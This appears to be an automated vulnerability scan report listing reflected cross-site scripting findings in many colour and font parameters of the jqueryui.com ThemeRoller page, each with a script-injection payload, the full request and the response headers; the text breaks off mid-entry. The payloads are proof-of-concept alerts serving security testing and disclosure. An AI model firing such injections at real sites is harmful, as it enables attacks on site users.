The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a27a"><script>alert(1)</script>10d27831cca was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=0101019a27a"><script>alert(1)</script>10d27831cca&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605a3"><script>alert(1)</script>449b4443c2d was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555605a3"><script>alert(1)</script>449b4443c2d&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b2e"><script>alert(1)</script>ab77fccbd26 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203ec0b2e"><script>alert(1)</script>ab77fccbd26&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8678d"><script>alert(1)</script>afc432a7bb6 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=0101018678d"><script>alert(1)</script>afc432a7bb6&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9fd"><script>alert(1)</script>f5ecfc6aec0 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636cc9fd"><script>alert(1)</script>f5ecfc6aec0&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ef8"><script>alert(1)</script>5eda88eabce was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121b4ef8"><script>alert(1)</script>5eda88eabce&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa395"><script>alert(1)</script>0fa87626802 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-seriffa395"><script>alert(1)</script>0fa87626802&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:23:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 286af"><script>alert(1)</script>fa88153198a was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px286af"><script>alert(1)</script>fa88153198a&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e8b"><script>alert(1)</script>2e205dee113 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal26e8b"><script>alert(1)</script>2e205dee113&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:23:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120034
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525e3"><script>alert(1)</script>e1a9bff29ab was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545525e3"><script>alert(1)</script>e1a9bff29ab&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2f25"><script>alert(1)</script>177d857462b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222f2f25"><script>alert(1)</script>177d857462b&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48bbf"><script>alert(1)</script>65e5ab4225b was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888848bbf"><script>alert(1)</script>65e5ab4225b&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adb4f"><script>alert(1)</script>981f4e08c10 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203eadb4f"><script>alert(1)</script>981f4e08c10&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f47"><script>alert(1)</script>50caeb8292e was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
